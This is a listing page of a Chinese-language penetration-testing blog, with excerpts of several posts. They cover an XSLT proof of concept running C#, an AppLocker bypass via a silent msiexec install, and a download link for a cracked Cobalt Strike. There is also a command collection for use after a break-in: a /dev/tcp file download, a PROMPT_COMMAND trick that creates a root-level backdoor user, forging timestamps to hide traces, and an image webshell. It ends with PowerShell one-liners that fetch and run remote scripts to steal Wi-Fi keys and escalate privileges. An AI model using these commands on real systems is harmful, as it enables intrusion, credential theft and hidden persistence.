Evi1cg's blog

  • 首页

  • 标签

  • 分类

  • 归档

  • 工具

  • 友链

  • 搜索

Office Shellcode Execution

发表于 2016-12-28 | 分类于 奇技淫巧

From: https://gist.github.com/subTee/e126c6ee847a4d9fcfd7CalcExcel.hta<html> <head> <script> var ob ...

阅读全文 »

Hack With XSLT

发表于 2016-12-28 | 分类于 渗透案例

0x00 简介

XSLT全称为拓展样式表转换语言,是一种用于将 XML 文档转换为 XHTML 文档或其他 XML 文档的语言。更多关于XSLT的教程可以参考W3school。关于XSLT的hack技巧之前已经有老师总结了WebShell系列(一)—XML,里面详细介绍了怎么通过xslt构造webshell,并且可以看的出,通过XSLT可以执行很多类型的脚本,前段时间@Casey Smith公开了一个Execute C# From XSLT 的POC,感觉很有趣,所以简单的研究了一下,也就有了此文。

0x01 POC

Casey Smith分享的poc如下:
calc.xslt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

<xsl:stylesheet version="2.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:my="urn:MyModule">

<msxsl:script implements-prefix="my" language="C#">
public void Exec()
{
System.Diagnostics.Process.Start("Calc.exe");
}
</msxsl:script>

<xsl:template match="data">
<result>
<xsl:value-of select="my:Exec()" />
</result>
</xsl:template>
</xsl:stylesheet>

阅读全文 »

cobaltstrike3.6 破解版

发表于 2016-12-21 | 分类于 工具收集

最近cobaltstrike更新到了3.6,所以下载了一下,并向小伙伴进行一下分享。运行截图: 破解以后的使用天数: 使用3.6你将拥有更强大的姿势,比如: 百度云: 链接: 戳我 密码: cjfx

阅读全文 »

Bypassing Applocker with msiexec

发表于 2016-11-17 | 分类于 奇技淫巧

msf生成MSI:

1
msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.msi

命令行运行:

1
msiexec /quiet /i cacl.msi

1.gif

阅读全文 »

Commands 搜集(持续更新)

发表于 2016-10-14 | 分类于 技术分享

Linux

Linux反弹shell后,方便的交互:

1
python -c 'import pty; pty.spawn("/bin/bash")'

无python时:

1
expect -c 'spawn bash;interact'

无wget nc等下载工具时下载文件

1
exec 5<>/dev/tcp/sec-lab.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat<&5 > c.pl

修改上传文件时间戳(掩盖入侵痕迹)

1
touch -r 老文件时间戳 新文件时间戳

利用BASH提权

这个要求管理员有su的习惯,我们可以通过它来添加一个id=0的用户
$PROMPT_COMMAND 利用这个变量保存了在主提示符$PS1显示之前需要执行的命令
导入:

1
export PROMPT_COMMAND=”/usr/sbin/useradd -o -u 0 hack &>/dev/null && echo hacker:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND”

lsof 命令

1
2
3
4
5
6
7
8
lsof 1.txt 显示开启文件 abc.txt 的进程
lsof -i :22 知道 22 端口现在运行什么程序
lsof -c nsd 显示 nsd 进程现在打开的文件
lsof -g gid 显示归属 gid 的进程情况
lsof +d /usr/local/ 显示目录下被进程开启的文件
lsof +D /usr/local/ 同上,但是会搜索目录下的目录,时间较长
lsof -d 4 显示使用 fd 为4 的进程
lsof -i [i] 用以显示符合条件的进程情况

SSH端口转发
下面文章详细描述了3种方式转发
http://www.cnblogs.com/david-zhang-index/archive/2012/08/18/2645943.html

图片马

1
Exiftool “-comment<=raj.php” 1.png

Windows

Powershell 相关

获取无线密码:

1
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Get-WLAN-Keys.ps1');Get-Wlan-Keys "

提权加账号

1
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'"

阅读全文 »
1…91011…21
Evi1cg

Evi1cg

此博客主要用来记录自己技术生涯中所学的一些知识,用来分享和备忘。
104 日志
7 分类
54 标签
RSS
GitHub Twitter 微博 E-Mail
whois api
© 2015 – 2022 Evi1cg